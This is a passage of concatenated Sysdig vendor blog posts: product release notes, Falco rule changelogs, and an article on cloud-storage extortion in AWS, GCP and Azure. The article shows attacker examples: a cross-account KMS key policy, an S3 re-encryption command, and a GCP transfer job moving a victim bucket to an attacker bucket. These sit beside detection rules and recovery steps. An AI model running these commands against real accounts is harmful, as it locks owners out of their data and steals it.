  • Fix: Add new zone label to GCP integrations
  • Feat: New integration – Microsoft IIS
  • Feat: New integration – Microsoft SQL Server Exporter
  • Sec: Security updates on exporters UBI images (2023-02)
  • Sec: Update helm chart with new image version
  • Doc: Correct TS consumption for Istio integration in our documentation
  • OSS: Create a PR in the Windows exporter official repo with a list of fixes

Dashboards and alerts:

  • Fix: Linux Host Integration should be listed in the Host Infrastructure category
  • Feat: Improve Memory Usage dashboard for Linux VMs and maybe join with Host Resource Usage
  • Fix: Missing parenthesis in PromQL expression in GCP PostgreSQL
  • Fix: Update Time series dashboard with new metric name
  • Fix: Kubernetes Alert for nodes down lack comparison with zero
  • Fix: Remove the dashboard “_AWS CloudWatch: DynamoDB Overview By Operation”
  • Fix: Windows dashboards scope to include job label
  • Refactor: Convert existing AWS CloudWatch templates to Prometheus format

Sysdig On-premise

New release for Sysdig On-premises with version 6.0

Upgrade Process

This release only supports fresh installations of the Sysdig platform into your cloud or on-premises environment.

For the full supportability matrix, see the Release Notes. This repository also includes the on-prem Installation instructions.

Monitor

Sysdig has migrated to a Prometheus-native data store, which is now available in on-premises deployments. This release adds several product offerings that are available on the Sysdig SaaS platform for the Monitor product. The following features are now available in a fresh installation of the 6.0.0 on-premises release.

  • Advisor
  • Dashboards
  • Explore
  • Alerts
  • Integrations

AWS CloudWatch Metrics

Notification Channels

Two new notification channels have been added:

Secure

Insights

Sysdig Secure has introduced a powerful visualization tool for threat detection, investigation, and risk prioritization to help identify compliance anomalies and ongoing threats to your environment. With Insights, all findings generated by Sysdig across both workload and cloud environments are aggregated into a visual platform that streamlines threat detection and forensic analysis. For more information, see Insights.

Compliance

New report types have been added to Unified Compliance:

  • GCP
  • Azure
  • Kubernetes
  • Docker
  • Linux

Threat Detection Policies and Rules

Threat detection policies now come in three “flavors,” following the same model as our SaaS platform.

  • Default/Managed Policies
  • Managed Ruleset Policies
  • Custom Policies

For a full description of these policy types, see Threat Detection Policies.

Integrations

Platform

Custom Roles

A custom role is an admin-defined role which allows Sysdig administrators to bundle a set of permissions and allocate it to one or more users or teams. This feature has been available in SaaS and is now released for our on-premises users. For more information, see Custom Roles.

Group Mappings

Group mappings allow you to connect groups from your identity provider (IdP) to the roles and teams associated with your Sysdig account.

Login Message

You can now configure a custom login message to help maintain your organization’s security standards.

Platform Audit

Sysdig provides both a UI and a set of APIs for auditing and reporting on the use of the Sysdig platform itself. By default, the UI is disabled to help minimize the required resources of running on-premises. The API is enabled by default. For more information, see Sysdig Platform Audit.

Privacy Settings

You can choose to opt in or out of sharing usage data with Sysdig.

Falco Rules Changelog

  • Added the following rules:
    • Kernel startup modules changed
    • Modify Timestamp attribute in File
    • Launch Code Compiler Tool in Container
    • Put Bucket ACL for AllUsers
    • Create Hardlink Over Sensitive Files
    • Azure Storage Account Created
    • Azure Storage Account Deleted
    • GCP Create Project
    • GCP Create Compute VM Instance
    • GCP Enable API
    • Create Bucket
    • Delete Bucket
    • Detect release_agent File Container Escapes
    • Java Process Class File Download
    • Launch Excessively Capable Container
    • Unprivileged Delegation of Page Faults Handling to a Userspace Process
  • Reduced false positives for the following rules:
    • Launch Package Management Process in Container
    • PTRACE anti-debug attempt
    • Linux Kernel Module Injection Detected
    • Launch Privileged Container
    • Reconnaissance attempt to find SUID binaries
    • Suspicious Operations with Firewalls
    • PTRACE attached to process
    • Read sensitive file untrusted
    • The docker client is executed in a container
    • Write below root
    • Schedule Cron Jobs
    • Suspicious Cron Modification
    • Launch Remote File Copy Tools in Container
    • Launch Suspicious Network Tool on Host
    • System procs activity
    • Modify Shell Configuration File
    • Write below etc
    • Launch Sensitive Mount Container
    • Mount Launched in Privileged Container
    • Clear Log Activities
    • Container Run as Root User
    • Launch Root User Container
    • Set Setuid or Setgid bit
    • Disallowed K8s User
    • Launch Excessively Capable Container
    • eBPF Program Loaded into Kernel
    • Non sudo setuid
    • Write below rpm database
    • Launch Root User in Container
    • Redirect STDOUT/STDIN to Network Connection in Container
    • Read ssh information
    • System ClusterRole Modified/Deleted
  • Improved the conditions for the following rules:
    • Put Bucket Lifecycle
    • Execution of binary using ld-linux
    • Mount Launched in Privileged Container
    • Tampering with Security Software in Container
    • Launch Ingress Remote File Copy Tools in Container
    • Modify Timestamp attribute in File
  • Updated k8s image registry domains.
  • Updated the MITRE, GCP MITRE, and AWS MITRE tags.
  • Improved the falco_privileged_images list.
  • Updated IoCs Ruleset with new findings.
  • Added Falco rules versioning support.
  • Added exceptions for the OpenSSL File Read or Write rule and the outbound Connection to C2 Servers rule.

Our Falco team has been busy over the last couple of months with multiple releases of new features. For more information on what was released during March and April, please review here.

New Website Resources

Blogs

Threat Research

Webinars

Tradeshows

Education

The Sysdig Training team provides curated, hands-on labs to learn and practice different topics. The selection of courses for the month of March:

The post What’s New in Sysdig – March & April 2023 appeared first on Sysdig.

Extortion in Cloud Storage https://sysdig.com/blog/extortion-in-cloud-storage/ Tue, 29 Nov 2022 16:30:00 +0000 https://sysdig.com/?p=62072 […] best practices to adopt in production. Google Cloud Platform ( GCP) Unlike AWS, GCP is not susceptible to the same […]

Extortion can simply be defined as “the practice of obtaining benefit through coercion.” Data and cloud extortion schemes occur when precious data and/or access is stolen by an attacker who promises to restore it through payment or other demands.

In this article, we’ll cover some common (and less common) extortion schemes, and highlight ways to detect them and avoid falling prey to demands.

First, an attacker needs to gain a foothold in an environment. This can be done in a variety of ways.

  • Exploiting vulnerabilities, such as Log4Shell or Spring4Shell, to gain access.
  • Finding access keys and other tokens stored in source code.
  • Using social engineering to get access granted, or credentials and keys disclosed.
  • Using malware that has infected a workstation to find stored credentials.

Simple user access within the environment may be sufficient to launch the attack; in other cases, the attacker may need to escalate privileges first.

Amazon Web Services (AWS)

In AWS environments, Amazon Simple Storage Service (S3) buckets can have file encryption on a per-bucket or per-file basis. For encryption, you can use the AWS-provided key, your own custom key, or a key from another account. Generally, encryption can be changed at any time.

An attacker with access to a compromised account can take advantage of using encryption keys from another account to encrypt and lock out access to files on the account.

First, the attacker creates a custom key on their AWS account. This may be from a disposable account for this sole purpose, or another compromised account to launch attacks from.

The attacker specifies which victim accounts are allowed to use their malicious key. When defining the key policy, the attacker removes kms:Decrypt and kms:DescribeKey. This prevents the victim from using the key to access their files, getting information about the key, or removing the key from their files.

An attacker’s key policy might look like:

{
  "Sid": "Allow use of the key",
  "Effect": "Allow",
  "Principal": {
    "AWS": "arn:aws:iam::1234567890:root"
  },
  "Action": [
    "kms:Encrypt",
    "kms:ReEncrypt*",
    "kms:GenerateDataKey*"
  ],
  "Resource": "*"
},
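
With the malicious key policy in place, re-encrypting the victim’s objects can be as simple as an in-place copy. The following is a hypothetical illustration using the AWS CLI; the bucket, object, and key ARN are all placeholders.

# Hypothetical: re-encrypt an object in place with a KMS key from another
# (attacker-controlled) account. All names and ARNs are placeholders.
aws s3 cp s3://victim-bucket/data.txt s3://victim-bucket/data.txt \
    --sse aws:kms \
    --sse-kms-key-id arn:aws:kms:us-east-1:111122223333:key/attacker-key-id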

Victims attempting to access their files will receive an “Access Denied” message when access has been locked out.

Attempts to remove foreign keys from locked files can result in errors.

Bucket versioning can help in this situation. Versioning is a feature of cloud storage to retain older copies of files and allow for rollback. By rolling back to a previous version of a file, account owners may be able to recover access to their files.
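
As a minimal sketch of that recovery path (bucket, object key, and version ID are placeholders), the s3api calls below list the versions that remain for an object and copy a previous version back over the current one:

# List the remaining versions of the affected object.
aws s3api list-object-versions --bucket victim-bucket --prefix data.txt
# Restore a previous version by copying it over the current object.
aws s3api copy-object \
    --bucket victim-bucket --key data.txt \
    --copy-source "victim-bucket/data.txt?versionId=PREVIOUS_VERSION_ID"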

Detect extortion in AWS Storage

A smart attacker will want to disable bucket versioning and delete old copies of files. A Falco rule can alert account owners of attempts to disable bucket versioning, and such alerts should not be treated lightly. Rule “AWS S3 Versioning Disabled” will detect such attempts.

- rule: AWS S3 Versioning Disabled
  desc: Detect disabling of S3 bucket versioning.
  condition:
    aws.eventSource = "s3.amazonaws.com" and
    aws.eventName = "PutBucketVersioning" and
    jevt.value[/requestParameters/VersioningConfiguration/Status] = "Suspended" and
    not aws.errorCode exists
  output:
    The file versioning for a bucket has been disabled.
    (requesting user=%aws.user,
     requesting IP=%aws.sourceIP,
     AWS region=%aws.region,
     arn=%jevt.value[/userIdentity/arn],
     bucket name=%jevt.value[/requestParameters/bucketName])
  priority: WARNING
  source: aws_cloudtrail

To finally remove access to the victim’s previous keys, the attacker can schedule the deletion of the keys. Keys cannot be deleted immediately; rather, there is a minimum seven-day waiting period before a key is finally destroyed.

Account owners using Falco can be alerted with rule “Schedule Key Deletion” when keys are scheduled for deletion and take immediate action to remedy the situation.

- rule: Schedule Key Deletion
  desc: Detect scheduling of the deletion of a customer master key.
  condition:
    aws.eventName="ScheduleKeyDeletion" and not aws.errorCode exists
  output:
    A customer master key has been scheduled for deletion.
    (requesting user=%aws.user,
     requesting IP=%aws.sourceIP,
     AWS region=%aws.region,
     arn=%jevt.value[/userIdentity/arn],
     key id=%jevt.value[/requestParameters/keyId])
  priority: WARNING
  source: aws_cloudtrail
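
If the alert fires within the waiting period, the scheduled deletion can be cancelled and the key re-enabled. A minimal sketch with the AWS CLI, where the key ID is a placeholder:

# Cancel a pending deletion; the key is left disabled, so re-enable it too.
aws kms cancel-key-deletion --key-id <key-id>
aws kms enable-key --key-id <key-id>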

Once the encryption has been changed, rollback copies are deleted, and original keys are destroyed, the victim is subject to demands from an attacker to restore access to their data.

If you want to know more, check out the 26 AWS security best practices to adopt in production.

Google Cloud Platform (GCP)

Unlike AWS, GCP is not susceptible to the same encryption key switching extortion technique. Encryption is mandatory at bucket creation time, and the key can be changed later, but the bucket cannot be left in a decrypted state or encrypted with a key from another account.

GCP users can use a Google-managed key or supply their own key. Keys apply to all files on the bucket uniformly, so there’s no exposure of per-file keys being changed.

Rather than using the key switching scheme described for AWS, attackers could use a slower method to lock out access. They need to move the files out of the bucket, delete old copies, and optionally upload encrypted versions of the files as placeholders. Attackers can manually download the files or create a Transfer Job to do the work for them.

A Transfer Job is a function in GCP to copy data from one bucket to another, optionally deleting the source files in the process. This can be used as a fast method for the attacker to steal data away from a victim. Once the files are transferred out and no longer available, the victim is subject to the attacker’s demands to get the data back.
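
As a hypothetical sketch of that technique (bucket names are placeholders, and the exact flags may vary with your gcloud version):

# Hypothetical: copy a victim's bucket to an attacker-controlled bucket,
# deleting the source objects once they are transferred.
gcloud transfer jobs create gs://victim-bucket gs://attacker-bucket \
    --delete-from=source-after-transfer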

Detect extortion in GCP Storage

Unfortunately for GCP users, the only audit log trace of a Transfer Job being initiated is a storage.setIamPermissions method call that grants the storage-transfer-service.iam.gserviceaccount.com service account the roles/storage.objectAdmin permission to perform the transfer. It is vague and easily missed, even by watchful eyes.

A Falco rule “GCP Set Bucket IAM Policy” can detect this and similar policy changes to buckets.

- rule: GCP Set Bucket IAM Policy
  desc: Detect setting the permissions on an existing bucket using IAM policies.
  condition:
    gcp.methodName="storage.setIamPermissions" and
    jevt.value[/protoPayload/status]={}
  output:
    The permissions on an existing bucket have been set using IAM policies
    (requesting user=%gcp.user,
     requesting IP=%gcp.callerIP,
     region=%jevt.value[/protoPayload/resourceLocation/currentLocations/0],
     bucket=%jevt.value[/protoPayload/resourceName])
  priority: WARNING
  source: gcp_auditlog

Similar to AWS, GCP implements versioning for the entire bucket. If bucket versioning is disabled, existing files retain their prior versions, but new versions are no longer created.

Unfortunately for account owners, when Object Versioning is disabled or file versions are deleted, GCP’s audit logs simply note an “unspecified bucket change.” This makes it difficult to be notified of potentially hazardous changes. If a file is deleted by an attacker, all previous versions of the file would also be deleted after some time.
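
Given that weak logging, it is worth verifying the versioning state of critical buckets directly. A minimal sketch with gsutil, where the bucket name is a placeholder:

# Check and enable Object Versioning on a bucket.
gsutil versioning get gs://victim-bucket
gsutil versioning set on gs://victim-bucket
# List all object generations, including noncurrent (archived) ones.
gsutil ls -a gs://victim-bucket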

Find more tips in 24 Google Cloud Platform (GCP) security best practices using open source code.

Microsoft Azure

Azure offers “Storage Accounts” for file storage needs. A Storage Account (bucket) has blobs (files) of data that are stored in containers (directories). The terminology is a bit different, but it operates much the same as AWS and GCP.

Azure does enable blob encryption by default with a key provided by Microsoft. Like GCP, Azure does not allow for the use of keys from foreign accounts.

Features like soft delete and file versioning can be used to help safeguard against attacks like those described for AWS and GCP. However, Azure has one default that is not a benefit: storage accounts are publicly accessible with read access by default. This can unknowingly open Azure customers to data exposure.

Publicly accessible blobs can leak credentials, sensitive information like Personal Identifiable Information (PII), or other data that should remain private. Leaked information can be valuable to attackers simply by extorting the original owners to not further leak the information. Tools like MicroBurst by NetSPI can be used to scan and search for storage accounts open to anonymous access.

Detect extortion in Azure Storage

Falco users can use the rule “Azure Access Level for Blob Container Set to Public” to alert on changes to storage account permissions.

- rule: Azure Access Level for Blob Container Set to Public
  desc: |
    Anonymous, public read access to a container and its blobs can be enabled in Azure Blob storage. It grants read-only access to these resources without sharing the account key, and without requiring a shared access signature. It is recommended not to provide anonymous access to blob containers until, and unless, it is strongly desired. A shared access signature token should be used for providing controlled and timed access to blob containers. If no anonymous access is needed on the storage account, it's recommended to set allowBlobPublicAccess false.
  condition:
    jevt.value[/operationName]="MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and
    jevt.value[/resultType]="Success" and
    jevt.value[/resultSignature]="Succeeded.OK" and
    jevt.value[/properties/responseBody] contains "\"allowBlobPublicAccess\":true"
  output:
    Anonymous access to blob containers has been allowed on storage account
    (requesting user=%jevt.value[/identity/claims/http:~1~1schemas.xmlsoap.org~1ws~12005~105~1identity~1claims~1name],
     storage account=%jevt.value[/resourceId])
  priority: WARNING
  source: azure_platformlogs

Public read access is enabled by default and should be disabled with the web interface or with the Azure command line interface (CLI). Here is how to use the Azure CLI to disable public access:

# First, gather a list of storage accounts.
az storage account list \
	--query '[*].name'
# For each result, use the returned value (as ACCOUNT_NAME) to get a list of containers
az storage container list \
	--account-name ACCOUNT_NAME \
	--query '[*].name'
# Now for each container name (as CONTAINER_NAME), check if public access is allowed.
az storage container show \
	--account-name ACCOUNT_NAME \
	--name CONTAINER_NAME \
	--query 'properties.publicAccess'
# Result should be 'container', 'blob', or nothing (meaning 'private' and no public access).
# Now for each result with 'container' or 'blob', disable public-access:
az storage container set-permission \
	--account-name ACCOUNT_NAME \
	--name CONTAINER_NAME \
	--public-access off
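
In the same spirit, it is worth confirming that blob soft delete is enabled so that deleted or overwritten blobs can be recovered. A minimal sketch with the Azure CLI, where the account name and retention period are placeholders:

# Enable blob soft delete with a 14-day retention window.
az storage blob service-properties delete-policy update \
	--account-name ACCOUNT_NAME \
	--enable true \
	--days-retained 14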

Summary

Understanding your cloud environment’s features is a key component in applying an effective security policy.

Extortion of cloud storage can easily be a greater cost than the cost of implementing a proper security posture. Keeping a watchful eye on your environment allows you to effectively respond to security events before they spiral out of control.

Combining a solution that keeps you compliant through Cloud Security Posture Management (CSPM) with real-time detection will leave you prepared for any scenario without wasting time reacting.


Sysdig can help sift through long cloud logs and alert on potential security events as soon as possible, without the need to store costly data lakes.

In addition, Sysdig unifies cloud security posture management (CSPM) and cloud threat detection.

Learn more in the following articles:

The post Extortion in Cloud Storage appeared first on Sysdig.

What’s new in Sysdig – April 2021 https://sysdig.com/blog/whats-new-sysdig-april-2021/ Tue, 20 Apr 2021 15:06:22 +0000 https://sysdig.com/?p=37105&preview=true&preview_id=37105 […] for securing cloud infrastructure. Multi-Cloud Threat Detection for AWS and GCP Based on Falco: Sysdig adds support for cloud threat […]

Welcome to another monthly update on what’s new from Sysdig. Ramadan Kareem to all observing the holy month of Ramadan. Our team continues to work hard to bring great new features to all of our customers, automatically and for free! This last month was a big month for security with our release of Cloud Security Posture Management (CSPM), and we had lots of fun designing and releasing our new Cloud Chaos game!

The power of combined cloud and container security

Using different cloud and container security tools requires manually correlating logs to catch a breach and uncover the systems impacted. By unifying the incident timeline and adding risk-based insights, Sysdig reduces the time to detect threats across clouds and containers from weeks to hours. Cloud development teams can see exactly where the attacker started and each step they took as they moved through the environment.

Read “Cloud lateral movement: Breaking in through a vulnerable container” for more on the steps involved in this type of lateral cloud movement attack.

New continuous CSPM from Sysdig

Cloud security posture management for AWS based on Cloud Custodian: Sysdig adds cloud asset discovery, cloud services posture assessment, and compliance validation. Cloud security teams can manage their security posture by automatically discovering all cloud services, as well as flagging misconfigurations and violations of compliance and regulatory requirements. These new features are based on Cloud Custodian, an open source tool for securing cloud infrastructure.

Multi-Cloud Threat Detection for AWS and GCP Based on Falco: Sysdig adds support for cloud threat detection via GCP audit logs, in addition to the AWS CloudTrail integration from last year. Security teams can continuously detect suspicious activity or configuration changes across their infrastructure without relying on a periodic configuration check. Sophisticated attackers can take advantage of exposed configurations to access the cloud, then revert it immediately once inside. A static check could miss these changes, leaving openings for attackers, and also overlook indicators that an attacker has breached the environment.

Sysdig uses open source Falco, the Cloud Native Computing Foundation’s de facto runtime security project, and alerts based on continuous inspection of cloud audit logs. It performs the analysis within the user’s cloud account, which protects sensitive data and eliminates costs tied to exporting logs. Currently, there are more than 200 out-of-the-box CloudTrail rules, and the database continues to grow as Sysdig and the community contribute at a rate of 20-50 new rules per month.

All Sysdig events, including CSPM, compliance, container runtime, and AWS CloudTrail events can be sent to AWS Security Hub to allow security teams to respond to threats faster.

Cloud Risk Insights: Sysdig provides new visual insights across interconnected cloud and container security incidents, prioritized by risk levels. Sysdig reduces alert noise and provides instant visibility to see the entire cloud attack chain, from a hacker exploiting a container vulnerability and accessing the cloud, to elevating privileges and performing catastrophic actions, such as cryptomining on a Kubernetes cluster. Classifying incidents based on severity levels allows teams to prioritize what to investigate and respond to first. Teams can then investigate all suspicious activity performed by a user to see the breadth of impact and quickly begin incident response activities.

Free tier for cloud security

Sysdig is offering continuous cloud security for free, forever, for a single account. With easy onboarding, users can begin to manage cloud posture within minutes. The free tier includes a daily check against CIS benchmarks and continuous threat detection to ensure cloud environments remain in a secure, compliant, and hardened state at all times. It also includes inline scanning for Fargate and ECR images, up to 250 images a month.

Open-standards approach to cloud security

Sysdig believes the future of security is open. Open source security delivers better security through faster innovation. Organizations can be confident they are adopting an accepted standard that will last. With this in mind, Sysdig chose to build its CSPM capabilities on top of Falco and Cloud Custodian. Sysdig selected the Cloud Custodian open source project because it has strong momentum in adoption, a rapidly growing database of rules, auto-remediation capabilities, and multi-cloud support.

Continue reading for more details on CSPM, as well as other new features that we have released this last month.

As always, please check out our release notes for more details on product updates, and ping your local Sysdig contact if you have questions about anything covered here.

Sysdig Secure

Sysdig Secure for cloud

Sysdig Secure for cloud is available with Cloud Risk Insights for AWS, Cloud Security Posture Management based on Cloud Custodian for AWS, and multi-cloud threat detection for AWS using Falco.

What’s Included in this release:

  • Insights: A powerful new visualization tool for threat detection, investigation, and risk prioritization, helping you identify compliance anomalies and ongoing threats to your environment. With Insights, all findings generated by Sysdig across both workload and cloud environments are aggregated into a visual platform that streamlines threat detection and forensic analysis.
  • Threat Detection based on AWS CloudTrail: To detect threats, anomalies, and suspicious activities with the flexible Falco engine. By leveraging AWS CloudTrail and the Falco language, you can detect any unexpected or unwanted behavior in your AWS accounts. Sysdig Cloud Connector leverages AWS CloudTrail as the source of truth for enabling governance, compliance, operational auditing, and risk auditing for your AWS account. Every API action over your infrastructure resources is recorded as a set of CloudTrail entries. Once the integration is deployed in your infrastructure, the Sysdig Cloud Connector can analyze these entries in real-time and provide AWS threat detection by filtering them against a flexible set of security rules. For more details, see the Sysdig Cloud Connector. Example detection rules include:
    • Attach a user to an Administrator Policy.
    • Create an HTTP Target Group without SSL.
    • Deactivate MFA for user access.
    • Delete S3 bucket encryption.
  • Cloud Security Posture Management with AWS Benchmarks: The AWS CIS Benchmarks assessment evaluates your AWS services against the benchmark requirements and returns the results and remediation activities you need to fix misconfigurations in your cloud environment. We’ve included several UI improvements to provide additional details, such as: control descriptions, affected resources, failing assets, and guided remediation steps, both manual and CLI-based.
  • Image Scanning for AWS ECR: One-click deployment using a CloudFormation template. Automatically scan images pushed to your Amazon Elastic Container Registry (ECR) using AWS-native technologies and Sysdig Secure. Sysdig image scanner integration is deployed as a CloudFormation template that listens to ECR registry events and uses AWS resources to streamline the image scanning process.
    • ECR itself will trigger the scan, no need for your CI/CD pipelines to actively pull from the registry.
    • Deployed in a few clicks, you just provide basic configuration parameters, such as the Sysdig API token or the Sysdig backend URL.
    • No need to configure registry scanning credentials on the Sysdig Secure side.
  • Image Scanning for AWS ECS & Fargate: One-click deployment using a CloudFormation template. Bringing the Sysdig Inline Scanning capabilities to automatically analyze the base images used for any task created using AWS Elastic Container Service (ECS or Fargate). Inline scanning living inside your AWS account means improved security:
    • No need to expose or configure private AWS registries.
    • Only image metadata is sent to Sysdig Secure, not the actual image contents.
    • No sensitive information ever leaves your AWS account.
    • An ephemeral task will be spawned to analyze each discovered image, in parallel.
    • Fully automated.
    • Scan results and scanning policies are still controlled from a single security governance point using Sysdig Secure.

How customers are using this

It’s no surprise that many Sysdig customers are container and Kubernetes users. Over the years, we’ve seen more and more people moving to managed container & Kubernetes platforms in cloud environments, and expanding their use of native cloud services. Our customers are now using these CSPM capabilities to extend the visibility and control that they had across their containerized applications into their whole cloud, and cloud native services. Our customers tell us this is allowing them to start thinking about tooling consolidation as well as providing a centralized view for all cloud consumers, including the security teams who often feel alienated by cloud native initiatives.

Free-forever cloud security tier

Sysdig is launching a new free-forever cloud security tier for one single account.

  • Easy onboarding in minutes.
  • Manage cloud posture with a daily run of CIS Benchmarks.
  • Detect threats with out-of-the-box CloudTrail detection rules based on Falco.
  • Scan containers (ECR/Fargate scanning) automatically and within your cloud environment for up to 250 images a month

How customers are using this

Many end-users we speak to that are considering Sysdig aren’t yet ready for a full tool, or they just need some simple use cases covered while they ramp up their cloud transformation and migration work. We’ve heard that while they are looking at the long-term picture, they still need something to help them with the short-term challenges and to start implementing some ‘quick wins.’ Our free tier is helping folks get a basic understanding of where they could improve their security, and start making those smaller improvements.

Image scanning reports v3 [BETA]

The Image Scanning Reports feature has been thoroughly updated, moving from a synchronous model to an asynchronous one, in which you schedule the reports you need and then receive them through your normal notification channels (e.g., email, Slack, webhook). The new version also includes:

  • A preview function to check report structure in the UI.
  • A more advanced query builder.
  • Extended set of data columns (e.g., CVSS base score and vector) and extended set of available filters (e.g., package type).

Reporting v3 supports two different types of reports:

  • Vulnerability report: Containing vulnerability, package, and image data. For example, vulnerabilities in my runtime with Severity ≥ High, a Fix available, and not included in a vuln exception list.
  • Policy report: Containing scanning policies and evaluated images data. For example, images in my internal registry failing the “NIST” scanning policy.

You need to enable this feature from the Sysdig Labs setting on the User Profile page.

How customers are using this

We’ve been listening to many customers ask for scheduled reports and the power to do complex reports that can take minutes if relying on real-time responses. Moving to asynchronous reporting has allowed the searching to be optimized and given customers more simplicity in the workflow. We’re hearing customers use these reports as part of their daily or weekly review tasks. They don’t need to leave their email inbox and can already start prioritizing security fixes and action new vulnerability notifications.

Feature enhancement: Falco policy types

Sysdig Secure has introduced Policy Types, a separation of policies into logical groups, based on the sources used in the policy engine. When creating a policy, you choose a type and then only the relevant scopes and container actions will be presented. We have also introduced a new policy type to support threat detection with AWS CloudTrail rules.

For full details, see Manage Policies.

How customers are using this

This has simplified the workflow for our customers. CSPM introduced a large number of new rules, so it has become important to allow users to quickly and visually filter through the policies to see the relevant ones for the task at hand. As they scale their usage, this becomes important for policies scoped and deployed across potentially thousands of hosts and dozens of cloud environments.

Sysdig Serverless Agent 1.0.0 for Fargate ECS

The “container-as-a-service” serverless environment calls for new agent models, and Sysdig provides them. Whereas in ECS, users still manage the underlying instances, with AWS Fargate the host is never visible and users simply run their workloads. And while this model is convenient, it can introduce risk as many people leave the containers unattended without monitoring security events that can exfiltrate secrets, compromise business data, impact performance, and increase AWS costs. In addition, it is impossible to install a standard agent in an environment where you do not have access to a host.

For these reasons, Sysdig has introduced a new “serverless agent” model that can be deployed in these container-based cloud environments. The first implementation is for Fargate (ECS).

Sysdig will be rolling out security features on the serverless agent over time. In v1.0.0, users will see:

  • Runtime Policies and Rules.
  • Secure Events.

To obtain secure event information, and the associated Falco policies and rules in the Sysdig Secure UI from a Fargate environment, users install the serverless agent using a CloudFormation Template. Then, log in to Sysdig Secure and review the events in the UI.
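
Deploying a CloudFormation template is standard AWS tooling; as a generic sketch (the template file, stack name, and required parameters are placeholders, since they depend on the version you download):

# Generic sketch: deploy the serverless agent stack from a downloaded template.
aws cloudformation deploy \
    --template-file serverless-agent.yaml \
    --stack-name sysdig-serverless-agent \
    --capabilities CAPABILITY_IAM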

See also: AWS Fargate Serverless Agents.

How customers are using this

This provides Sysdig users with much needed visibility and control of their Fargate workloads. We’re seeing more people migrating to managed Kubernetes platforms, but they don’t want to compromise on the visibility they have when using a fully deployed variant. We’re hearing this helps accelerate the adoption of fully managed Kubernetes like Fargate, which comes with other advantages around operational efficiencies.

Falco rules

v0.12.1 is the latest version. Below is a diff of changes from v0.10.5, which we covered last month.

  • Fixed a defect that could prevent deploying rules to several older Sysdig backend versions.
  • Added new versions of falco_rules.yaml/k8s_audit_rules.yaml that use exceptions instead of collections of macros and long condition strings. The rules coverage should be identical to older versions.
  • Fixed minor problems with the rules installation script.
  • Added 164 rules that detect suspicious/anomalous/notable behavior from a stream of AWS CloudTrail events. This requires a Sysdig backend that supports policy types and running the Cloud Connector.
  • The new policy, Sysdig AWS Best Practices, includes 41 of the above rules that Sysdig recommends using for the AWS environments.

Sysdig Monitor

PromQL cheatsheet

Since releasing PromQL support in Sysdig Monitor, we’re seeing many customers make great use of this feature and leverage their existing Prometheus skills investments. Some fantastic use-cases are being built out and it’s great to see users get the most out of our native enterprise support. However, for every PromQL expert, there are 10 other users who haven’t used Prometheus before or don’t know where to start. We’re doing things to make the transition easier, including the release of a PromQL Cheatsheet to help folks get started. Whether you’re new to PromQL or just need a handy reference guide, this should be a really useful resource to have in your toolkit.

Download the PromQL CheatSheet!

Sysdig Agents

Sysdig Agent

The latest Sysdig Agent release is 11.1.2. Below is a diff of updates since 11.0.0, which we covered in our last update.

  • Enhanced Connection with Kubernetes API Server
    • Kubernetes reconnect logic has been improved to automatically back off (1 min, 2 min, 4 min… 1hr) if the connection is continuously dropped when using Thin Cointerface. This reduces the load that the agent imposes on the Kubernetes API Server in clusters with heavily burdened API servers.
  • Reduced Load on Kubernetes API Server
    • The agent’s readiness probe has been improved to not report ready until after the agent connects to the Kubernetes API server. This reduces the load that the agent imposes on the Kubernetes API server when starting up during RollingUpdate.
  • Agent Reports Memory Usage Accurately for Containers
    • Fixed an issue where the agent would incorrectly report memory.bytes.used for containers that use more than 4GB.
  • Runtime Policies Work as Expected
    • The runtime policies that have a policy type and capture action are handled as expected.
  • Agent Tags in Policy Scopes
    • Agent tags are supported in runtime policy scopes.
  • Metric Limits Are Updated As Expected
    • Fixed a problem where metric limits were not updated from the defaults. This is unlikely to happen if agents are connected to the SaaS backend.
  • Configured Tags in Prometheus Scraper
    • Fixed a problem in the old Prometheus scraper (used when promscrape is disabled) to ensure that configured tags are properly added to the metrics.
  • JMX Metrics for Short-Lived Java Processes
    • Fixed an issue where short-lived Java processes could cause the Sysdig Agent to stop collecting JMX metrics.
  • Misconfiguration No Longer Leads to Agent Constantly Querying Kubernetes API Server
    • Fixed a problem where the agent would continuously send requests to the Kubernetes API server to query the endpoints API. This occurs when the agent’s clusterrole is incorrectly configured. With this fix, the agent will no longer repeat the attempt if it is unable to connect to the Kubernetes API during boot.
  • Scope Runtime Policies
    • The runtime policies are now correctly scoped by kubernetes.cluster.name. The fix in 10.6.0 was incomplete.
  • Agent Correctly Reports Replicasets
    • Fixed an issue where the agent could lose track of a replicaset and report incomplete metadata.
  • Agent Issues Over HTTP Proxy
    • Fixed an agent connection issue over plaintext HTTP proxy with encryption.
    • Fixed an agent connection issue via HTTP proxy connections over SSL.

Sysdig Serverless Agent

Introduced this last month, the current version is v1.0.0.

The serverless agent is described in detail in the Sysdig Serverless Agent 1.0.0 for Fargate ECS section above. See also: AWS Fargate Serverless Agents.

Sysdig Agent – Helm chart

The Helm Chart 1.11.11 is the latest version. Below is a diff of updates since v1.11.7, which we covered in our last update.

  • Use the latest image for Sysdig Agent (11.1.2).
  • Fix in the imageanalyzer extravolumes.
  • Improvements and fixes in README for installation instructions (use sysdig-agent namespace by default).

Node image analyzer

Version 0.1.11 was released, and contains the following diff updates since v0.1.10, which we covered in our last update.

  • Fixed a bug that prevented the Origin field from being populated on the UI for images analyzed by NIA on containerd environments.
  • Fixed an issue that resulted in some unscanned images with “unknown media type during manifest conversion” error logs on containerd environments.
  • Fixed an issue that caused the NIA container to report “unhealthy” status.

Node image analyzer can be installed as part of the Sysdig Agent install.

Inline scanning engine

Version 2.3.2 is still the latest release, which we covered in our last update.

See also: Integrate with CI/CD Tools.

SDK, CLI and Tools

Sysdig CLI

v0.7.8 is the latest release. Below is a diff of updates since v0.7.5, which we covered in our last update.

  • Add runtime security policy types support (as discussed in the Secure section above).
  • Update sdc-cli event get to use the get_event method in SDK (This allows the retrieval of an event via its ID even if it’s very old).
  • Add dashboard import from PromCat format.
  • Allow restore policy type from backups.

See also: Sysdig CLI page.

Python SDK

v0.15.1 is the latest release. Below is a diff of updates since v0.14.13, which we covered in our last update.

  • Add get_event by ID method to Events client v1 and v2.
  • Add policy types support (as discussed in the Secure section above).
  • Add delete_sysdig_capture method.
  • Add user provisioning without email confirmation.

Terraform provider

v0.5.14 has been released. Below are the diff changes from v0.5.11, which we covered last month:

  • Allow to use aws_cloudtrail policies.
  • Add policy types support (as discussed in the Secure section above).
  • Add Falco rule type ‘aws_cloudtrail‘.
  • Fixed trigger_after_pct not being handled correctly in the sysdig_monitor_alert_downtime resource.

See also: Sysdig Terraform provider documentation.

Falco VS Code extension

